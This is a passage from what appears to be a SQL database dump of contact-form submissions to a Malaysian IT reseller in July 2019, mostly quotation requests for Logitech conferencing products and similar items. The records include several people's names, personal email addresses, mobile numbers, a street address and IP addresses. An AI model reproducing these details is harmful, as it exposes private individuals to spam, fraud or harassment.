Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:50:\"Group 15m Extended Cable, Group 10m Extended Cable\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Please quote item selected.\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-06 10:30:54','124.82.60.16','1'),(223,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"Sundarajoo a/l Thulasiraman\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:22:\"sundar982477@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0167063986\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"Universiti Teknologi Petronas\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:76:\"May I have the quotation for the Spotlightâ„¢ Presentation Remote? Thank You\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-06 14:58:17','14.1.227.118','1'),(224,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:13:\"Adrian Thomas\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:24:\"adrianthomas93@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0145571440\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:20:\"Arktiek OMA Sdn. Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:122:\"Lot 1, 1st &amp; 2nd Floor, Taman Fortuna Shoplots, Phase ll, Lorong Seroja 1, Jalan Penampang, 88200 Kota Kinabalu, Sabah\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:37:\"Logitech MeetUp, MeetUp Expansion Mic\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:40:\"Please quote the price for us. Thank you\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"88\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-09 15:54:13','210.186.156.189','1'),(225,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Jonathan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"jonathan.musicbliss@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0103832122\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Music Bliss\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:434:\"Hi there, I&#039;m looking for a headset solution package for my call centre. To put into context perspective, I have a supervisor and his agents in a team.. they use handphone lines as their main mode for customers to call in. I&#039;m looking for a device that can link both headsets together so that the Supervisor can listen and provide the training over the phone/ join the conversation if necessary. Do you have such a solution?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"24\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-10 17:06:53','175.136.221.118','1'),(226,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:8:\"Jonathan\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:29:\"jonathan.musicbliss@gmail.com\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0103832122\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Music Bliss\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:434:\"Hi there, I&#039;m looking for a headset solution package for my call centre. To put into context perspective, I have a supervisor and his agents in a team.. they use handphone lines as their main mode for customers to call in. I&#039;m looking for a device that can link both headsets together so that the Supervisor can listen and provide the training over the phone/ join the conversation if necessary. Do you have such a solution?\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"24\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-10 17:07:22','175.136.221.118','1'),(227,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"faizul nizam\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"faizul@granity.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0162150237\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:25:\"Granity Resources Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:46:\"Request quotation battery Zebra ZQ520 10 units\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:2:\"12\";}i:8;a:7:{s:2:\"id\";s:1:\"4\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"2\";s:5:\"value\";s:0:\"\";}}','Contact Us','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-11 12:07:45','175.136.249.158','1'),(228,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:11:\"Aizat akmal\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:16:\"Aizat@ofs.org.my\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0193716504\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:32:\"Ombudsman for financial services\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:82:\"Level 14, main block menara takaful malaysia, no 4 jalan sultan Sulaiman, 50000 kl\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:15:\"Logitech BCC950\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-12 13:25:11','115.164.173.162','1'),(229,2,'a:11:{i:0;a:7:{s:2:\"id\";s:2:\"11\";s:4:\"slug\";s:22:\"get-quotation-logitech\";s:4:\"name\";s:24:\"Get Quotation (Logitech)\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:2:\"15\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:12:\"Victor Phang\";}i:2;a:7:{s:2:\"id\";s:2:\"16\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:28:\"Victor.phang@worksmartly.com\";}i:3;a:7:{s:2:\"id\";s:2:\"19\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0126796218\";}i:4;a:7:{s:2:\"id\";s:2:\"17\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:27:\"WorkSmartly Digital Sdn Bhd\";}i:5;a:7:{s:2:\"id\";s:2:\"22\";s:4:\"slug\";s:7:\"address\";s:4:\"name\";s:7:\"Address\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:17:\"Bdr Sri Damansara\";}i:6;a:7:{s:2:\"id\";s:2:\"21\";s:4:\"slug\";s:16:\"logitech-product\";s:4:\"name\";s:16:\"Logitech Product\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";s:611:\"a:20:{i:0;s:14:\"Logitech Group\";i:1;s:14:\"Logitech Rally\";i:2;s:15:\"Logitech MeetUp\";i:3;s:16:\"Logitech Connect\";i:4;s:15:\"Logitech BCC950\";i:5;s:18:\"Logitech PTZ Pro 2\";i:6;s:9:\"SMARTDOCK\";i:7;s:13:\"Logitech Brio\";i:8;s:15:\"Logitech C9230e\";i:9;s:14:\"Logitech C925e\";i:10;s:13:\"Logitech B525\";i:11;s:22:\"Logitech H570e Headset\";i:12;s:22:\"SmartDock Extender Box\";i:13;s:12:\"Screen Share\";i:14;s:20:\"Group Expansion Mics\";i:15;s:23:\"Logitech SmartDock Flex\";i:16;s:24:\"Group 15m Extended Cable\";i:17;s:24:\"Group 10m Extended Cable\";i:18;s:20:\"MeetUp Expansion Mic\";i:19;s:32:\"Other (Please specify the model)\";}\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:14:\"Logitech Group\";}i:7;a:7:{s:2:\"id\";s:2:\"18\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:8;a:7:{s:2:\"id\";s:2:\"12\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:9;a:7:{s:2:\"id\";s:2:\"13\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two digits\";s:4:\"type\";s:6:\"secret\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:2:\"12\";}i:10;a:7:{s:2:\"id\";s:2:\"14\";s:4:\"slug\";s:6:\"submit\";s:4:\"name\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:2:\"12\";s:5:\"value\";s:0:\"\";}}','Get Quotation (Logitech)','Bintara solutions Sdn Bhd','info@bintara.com.my','a:2:{i:0;s:19:\"faiz@bintara.com.my\";i:1;s:19:\"info@bintara.com.my\";}','2019-07-12 14:40:06','113.210.51.43','1'),(230,1,'a:9:{i:0;a:7:{s:2:\"id\";s:1:\"1\";s:4:\"slug\";s:10:\"contact-us\";s:4:\"name\";s:10:\"Contact Us\";s:4:\"type\";s:8:\"fieldset\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:1;a:7:{s:2:\"id\";s:1:\"5\";s:4:\"slug\";s:9:\"full-name\";s:4:\"name\";s:9:\"Full Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:21:\"PENGIRAN HAFFEY IZZAT\";}i:2;a:7:{s:2:\"id\";s:1:\"6\";s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:19:\"haffey@sains.com.my\";}i:3;a:7:{s:2:\"id\";s:2:\"10\";s:4:\"slug\";s:12:\"number-phone\";s:4:\"name\";s:12:\"Number Phone\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:10:\"0138130839\";}i:4;a:7:{s:2:\"id\";s:1:\"7\";s:4:\"slug\";s:12:\"company-name\";s:4:\"name\";s:12:\"Company Name\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:5:\"SAINS\";}i:5;a:7:{s:2:\"id\";s:1:\"8\";s:4:\"slug\";s:7:\"message\";s:4:\"name\";s:7:\"Message\";s:4:\"type\";s:4:\"text\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:93:\"Hello, can you brief me in details regarding AnyDesk and how it is different than TeamViewer.\";}i:6;a:7:{s:2:\"id\";s:1:\"2\";s:4:\"slug\";s:12:\"verification\";s:4:\"name\";s:12:\"Verification\";s:4:\"type\";s:12:\"verification\";s:7:\"options\";s:0:\"\";s:9:\"parent_id\";s:1:\"0\";s:5:\"value\";s:0:\"\";}i:7;a:7:{s:2:\"id\";s:1:\"3\";s:4:\"slug\";s:27:\"please-enter-any-two-digits\";s:4:\"name\";s:27:\"Please enter any two 